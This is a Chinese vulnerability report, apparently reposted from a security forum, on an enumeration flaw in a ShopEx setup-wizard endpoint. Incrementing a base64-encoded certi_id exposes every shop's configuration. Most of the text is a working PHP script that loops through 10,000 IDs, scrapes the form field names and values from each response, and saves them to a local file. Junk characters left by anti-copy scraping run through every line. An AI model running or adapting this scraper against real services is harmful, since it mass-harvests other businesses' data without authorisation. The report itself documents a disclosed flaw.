|
简要描述:
3 \9 e# }. O% A" `9 wShopEx某接口缺陷,可遍历所有网站; k9 c4 D/ N S) l! n
详细说明:
" M) v+ V0 l- O问题出现在shopex 网店使用向导页面 ; A, n1 w. g- P& q
% Z& ~& c5 n# m. I8 ^5 s, M& |7 g2 N; V3 [
# ^7 U& o- e G! l/ ihttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
* b3 c4 U; U5 W
7 p. X6 G. b! b) n5 Z6 ?! H# x* ~! q$ p- C3 Z
; v1 A0 ?- U k) o+ a
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}5 s/ |: W9 e5 t; z
4 ~: G3 h. f: j z' n# {
; u% q% {: U2 k1 Q2 x3 `& h3 o0 }3 E& c# |0 m+ f4 K$ y% `4 ?
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 7 ^/ s% ]# D+ V% _' E) M4 o
$ u) P( I6 S6 S
. \( `4 h5 [" o; @% i* U" `1 D1 t2 s+ Z/ ^ S: [1 u) E& A, n' c
<?php
6 H( d- C+ V$ L# I, j; ]. [, v/ T3 @3 z
for ($i=1; $i < 10000; $i++) { //遍历* j$ Z4 x4 w1 [* h+ i/ K
9 f, f7 T: A; u* P- y$ K
ShowshopExD($i);4 J- E# h' ^4 F7 \6 p" ~+ k
! K5 j5 U8 Z5 e: F2 o" g
}
; C8 c1 Z$ `# u# J+ }3 I* v# E: `3 g/ P# c
function ShowshopExD($cid) {
: @- h. Z z* e. Z0 E% E7 d
4 T. J& h5 I2 f$ k, Z% `: _$ A $url='http://guide.ecos.shopex.cn/step2.php';
. _8 y' z+ w" g" z# U9 C- A! k
; {3 v% T. n! R2 l2 Y $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');; p% x# r: i$ k# ]7 A+ ~, O( h" B
3 s+ e- c0 k: ~% N, q# Q0 V
$url = $url.'?refer='.$refer;
O4 S+ H3 t3 L( v, E. r
, T/ i; Y. H/ L $ch = curl_init($url);8 V0 S5 |2 Y0 K6 A
) Y ?1 J' n F0 ?7 v5 `5 B ]
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;' }6 e1 d9 s' t' J; L
0 Q$ t+ l& T1 g) J0 { curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
w# N; S; b3 k6 [9 @) K: [4 P& L! V& c" ^) b/ }& N
$result = curl_exec($ch);
6 m A# v0 r: o0 s" `2 N. D7 m% K7 g8 c8 M# ^& `
$result = mb_convert_encoding($result, "gb2312", "UTF-8");- r& I t* a8 N: [
) y4 P; Q6 D) T! _ _. C2 @+ w' w
if(strpos($result,$refer))) I. ^* g2 g2 Y
8 r! q$ [; o( Y( m
{6 n- Y" N) D- D7 a8 Z5 ?- O
, `$ ~) c1 a. r" k# `$ z6 `
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件! [ o! I( z8 t# ?. s' F
" M! [- M( D7 D7 `# \
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);9 X, W b% w3 ~# Y* m# o
6 Q4 |8 l+ g; ~. }- ^0 P, M
foreach ($value[1] as $key) { ~3 r) G _/ ]$ f7 m& ~; o1 @
/ T" [8 G* e2 T# w& F$ k
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);$ F6 l) Y, k; ?2 w' ~, ~- q$ |# @
# |" k( `; v& x% Q. U echo $res[1][0].':'.$res[3][0]."\r\n";: ^9 N, [- ~7 B& Q' a& \4 K
1 N4 T2 J6 c- M, [8 I% {
$col =$res[1][0].':'.$res[3][0]."\r\n"; 5 Y6 H6 q, r( G' h
, |% M, {$ f) t+ ^: _
fwrite($fp, $col, strlen($col)); 3 Y4 h& S& Q3 k+ t- o* \5 _; Y( I
8 N$ I; y2 K& P5 R4 |1 u
}
+ `6 }- X u+ k/ @0 p# u
. `+ A" r' c e' I echo '--------------------------------'."\r\n";
( M' `) G- a0 _. u. c( q1 ^
" v7 G6 I+ W& i+ N fclose($fp); 6 u, _$ n0 o; W) E" i
( X/ f1 P' p6 s5 S' Z! Q- m2 ?+ R. M
}
$ N* M3 X4 R& C5 L3 R2 [
. S( O5 ?. o. |; v- z: {2 U; Y+ Z flush();% q D8 s: c2 v/ n# i
6 u6 y8 g, O9 l5 x; g7 U$ c curl_close($ch);6 a- y7 Q" {; F+ h; U8 D4 d
/ s8 ^& |3 v- I: U: o4 y6 Q
}
4 S% K& O9 e- H9 f; i1 G9 N" a- i( w, E
?>
% X! p: x6 M& A+ y4 A# p) l m2 q漏洞证明:9 ^6 [! R; {1 V
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
5 l5 p* N* i' C+ }( brefer换成其他加密方式
. A- @; }2 T. U3 i* j; m |
|